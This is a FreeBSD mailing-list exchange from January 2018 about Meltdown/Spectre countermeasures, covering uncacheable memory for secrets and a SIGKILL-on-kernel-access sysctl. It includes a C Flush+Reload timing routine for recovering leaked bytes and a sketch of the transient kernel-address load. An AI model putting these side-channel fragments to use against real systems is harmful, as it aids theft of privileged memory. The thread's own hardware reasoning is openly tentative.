Date:      Sat, 6 Jan 2018 17:07:16 +0100 (CET)
From:      Wojciech Puchar <wojtek@puchar.net>
To:        Eric McCorkle <eric@metricspace.net>
Cc:        "freebsd-hackers@freebsd.org" <freebsd-hackers@FreeBSD.org>, "freebsd-arch@freebsd.org" <freebsd-arch@freebsd.org>
Subject:   Re: Fwd: A more general possible meltdown/spectre countermeasure
Message-ID:  <alpine.BSF.2.20.1801061701200.40627@puchar.net>
In-Reply-To: <33bcd281-4018-7075-1775-4dfcd58e5a48@metricspace.net>
References:  <c98b7ac3-26f0-81ee-2769-432697f876e5@metricspace.net> <33bcd281-4018-7075-1775-4dfcd58e5a48@metricspace.net>

Sorry for the stupid question, but as I understand it these attacks work
as follows:

1) Access a byte at a virtual address one is not allowed to read, and use
the next (transiently executed) instruction to access one's own memory at
an offset derived from that byte, so a cache line is filled depending on
a value one shouldn't be able to read.

2) As the kernel takes the trap on the access violation, it delivers
SIGSEGV or SIGBUS, which the application can catch with signal(2) and
simply ignore.

3) Another part of the code does some timing magic to detect which cache
line was filled, and from that the byte's value can be recovered (a rough
sketch of this step follows below).
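
Step 3, as a minimal Flush+Reload-style sketch (the 4096-byte stride, the
probe array and the cycle threshold are illustrative assumptions, not
taken from any particular exploit):

#include <stdint.h>
#include <x86intrin.h>          /* __rdtscp(); x86 only */

#define STRIDE          4096    /* one page per possible byte value */
#define HIT_THRESHOLD   80      /* cycles; machine-dependent guess */

static uint8_t probe[256 * STRIDE];

/* Return the value whose probe line reloads fastest, i.e. was cached. */
static int
guess_byte(void)
{
        unsigned int aux;
        int best = -1;

        for (int i = 0; i < 256; i++) {
                volatile uint8_t *p = &probe[i * STRIDE];
                uint64_t t0 = __rdtscp(&aux);
                (void)*p;                       /* reload */
                if (__rdtscp(&aux) - t0 < HIT_THRESHOLD)
                        best = i;
        }
        return (best);
}

The faulting access in step 1 is what primes exactly one of those 256
lines; the timing loop itself only touches the attacker's own memory.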


My question is: why can't any access attempt to kernel space simply
generate SIGKILL instead? Of course that would get in the way of program
development, but since developers today rarely share a timesharing
machine and mostly have their own private computers, a simple sysctl
variable to switch the behaviour would suffice.
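
For what it's worth, that knob would be tiny on the kernel side. A
minimal sketch, assuming a security.* sysctl (the name, default and
description are made up, and the actual change to the trap handler's
signal selection is not shown):

#include <sys/param.h>
#include <sys/kernel.h>
#include <sys/sysctl.h>

/* Hypothetical knob: 0 = deliver SIGSEGV/SIGBUS as today, 1 = SIGKILL. */
static int kill_on_kernel_access = 0;
SYSCTL_INT(_security, OID_AUTO, kill_on_kernel_access, CTLFLAG_RWTUN,
    &kill_on_kernel_access, 0,
    "Deliver SIGKILL on user-mode access to kernel addresses");

The trap code would then consult this flag when the faulting address lies
in the kernel range and substitute SIGKILL for the usual signal.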

On Fri, 5 Jan 2018, Eric McCorkle wrote:

> Re-posting to -hackers and -arch.  I'm going to start working on
> something like this over the weekend.
>
> -------- Forwarded Message --------
> Subject: A more general possible meltdown/spectre countermeasure
> Date: Thu, 4 Jan 2018 23:05:40 -0500
> From: Eric McCorkle <eric@metricspace.net>
> To: freebsd-security@freebsd.org <freebsd-security@freebsd.org>
>
> I've thought more about how to deal with meltdown/spectre, and I have an
> idea I'd like to put forward.  However, I'm still in something of a
> panic mode, so I'm not certain as to its effectiveness.  Needless to
> say, I welcome any feedback on this, and I may be completely off-base.
>
> I'm calling this a "countermeasure" as opposed to a "mitigation", as
> it's something that requires modification of code as opposed to a
> drop-in patch.
>
> == Summary ==
>
> Provide a kernel and userland API by which memory allocation can be done
> with extended attributes.  In userland, this could be accomplished by
> extending MMAP flags, and I could imagine a malloc-with-attributes flag.
> In kernel space, this must already exist, as drivers need to allocate
> memory with various MTRR-type attributes set.
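>
> As a very rough sketch of the userland side (MAP_NOCACHE and
> malloc_attr() here are placeholders for the proposed API, not existing
> FreeBSD interfaces):
>
>   #include <sys/mman.h>
>
>   size_t key_len = 32;                    /* whatever the asset size is */
>
>   /* Hypothetical flag: back the mapping with uncacheable pages. */
>   void *key = mmap(NULL, key_len, PROT_READ | PROT_WRITE,
>       MAP_ANON | MAP_PRIVATE | MAP_NOCACHE, -1, 0);
>
>   /* ...or, with a malloc-with-attributes style interface: */
>   void *key2 = malloc_attr(key_len, MEM_ATTR_UNCACHEABLE);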
>
> The immediate aim here is to store sensitive information that must
> remain memory-resident in non-cacheable memory locations (or, if more
> effective attribute combinations exist, using those instead).  See the
> rationale for the argument why this should work.
>
> Assuming the rationale holds, then the attack surface should be greatly
> reduced.  Attackers would need to grab sensitive data out of stack
> frames or similar locations if/when it gets copied there for faster use.
> Moreover, if this is done right, it could dovetail nicely into a
> framework for storing and processing sensitive assets in more secure
> hardware[0] (like smart cards, the FPGAs I posted earlier, or other
> options).
>
> The obvious downside is that you take a performance hit storing things
> in non-cacheable locations, especially if you plan on doing heavy
> computation in that memory (say, encryption/decryption).  However, this
> is almost certainly going to be less than the projected 30-50%
> performance hit from other mitigations.  Also, this technique should
> work against spectre as well as meltdown (assuming the rationale holds).
>
> The second downside is that you have to modify code for this to work,
> and you have to be careful not to keep copies of sensitive information
> around too long (this gets tricky in userland, where you might get
> interrupted and switched out).
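>
> For the short-lived copies you can't avoid, the usual scrubbing
> discipline applies; roughly (use_key() and the buffer size are made up,
> explicit_bzero(3) is the existing interface):
>
>   #include <string.h>                     /* memcpy */
>   #include <strings.h>                    /* explicit_bzero */
>
>   unsigned char tmp[64];
>
>   memcpy(tmp, key, sizeof(tmp));          /* short-lived working copy */
>   use_key(tmp, sizeof(tmp));              /* hypothetical consumer */
>   explicit_bzero(tmp, sizeof(tmp));       /* scrub as soon as it's done */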
>
>
> [0]: Full disclosure, enabling open hardware implementations of this
> kind of thing is something of an agenda of mine.
>
> == Rationale ==
>
> (Again, I'm tired, rushed, and somewhat panicked so my logic could be
> faulty at any point, so please point it out if it is)
>
> The rationale for why this should work relies on assumptions about
> out-of-order pipelines that cannot be guaranteed to hold, but are
> extremely likely to be true.
>
> As background, these attacks depend on out-of-order execution performing
> operations that end up affecting cache and branch-prediction state,
> ultimately storing information about sensitive data in these
> side-channels before the fault conditions are detected and acted upon.
> I'll borrow terminology from the paper, using "transient instructions"
> to refer to speculatively executed instructions that will eventually be
> cancelled by a fault.
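>
> At the C level, the transient sequence boils down to roughly this
> (kern_addr and probe[] stand in for the privileged address and the
> attacker's own flush+reload array):
>
>   #include <stdint.h>
>
>   extern uint8_t probe[256 * 4096];       /* attacker-controlled, flushed beforehand */
>   extern const uintptr_t kern_addr;       /* some privileged address */
>
>   uint8_t v = *(volatile uint8_t *)kern_addr;  /* faults, but may execute transiently */
>   (void)probe[v * 4096];                       /* dependent load fills one cache line */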
>
> These attacks depend entirely on transient instructions being able to
> get sensitive information into the processor core and then perform some
> kind of instruction on them before the fault condition cancels them.
> Therefore, anything that prevents them from doing this *should* counter
> the attack.  If the actual sensitive data never makes it to the core
> before the fault is detected, the dependent memory accesses/branches
> never get executed and the data never makes it to the side-channels.
>
> Another assumption here is that CPU architects are going to want to
> squash faulted instructions ASAP and stop issuing along those
> speculative branches, so as to reclaim execution units.  So I'm assuming
> once a fault comes back from address translation, then transient
> execution stops dead.
>
> Now, break down the cases for whether the address containing sensitive
> data is in cache and TLB or not.  (I'm assuming here that caches are
> virtually-indexed, which enables cache lookups to bypass address
> translation[1].)
>
> * In cache, in TLB: You basically end up racing the cache against the
> TLB, which will very likely detect the fault before the data arrives;
> at the very worst, you get one or two cycles of transient instruction
> execution before the fault.
>
> * In cache, not in TLB: With a virtually-indexed cache you get a cache
> lookup racing a page-table walk.  The cache lookup beats the page table
> walk by potentially hundreds (maybe thousands) of cycles, giving you a
> bunch of transient instructions before a fault gets triggered.  This is
> the main attack case.
>
> * Not in cache, in TLB: Memory access requires address translation,
> which comes back almost immediately as a fault.
>
> * Not in cache, not in TLB: You have to do a page table walk before you
> can fetch the location, as you have to go out to physical memory (and
> therefore need a physical address).  The page table walk will come back
> with a fault, stopping the attack.
>
> So, unless I'm missing something here, both non-cached cases defeat the
> meltdown attack, as you *cannot* get the data unless you do address
> translation first (and therefore detect faults).
>
> As for why this defeats the spectre attack, the logic is similar: you've
> jumped into someone else's executable code, hoping to scoop up enough
> information into your branch predictor before the fault kicks you out.
> However, to capture anything about sensitive information in your
> side-channels, the transient instructions need to actually get it into
> the core before a fault gets detected.  The same case analysis as above
> applies, so you never actually get the sensitive info into the core
> before a fault comes back and you get squashed.
>
>
> [1]: A physically-indexed cache would be largely immune to this attack,
> as you'd have to do address translation before doing a cache lookup.
>
>
> I have some ideas that can build on this, but I'd like to get some
> feedback first.


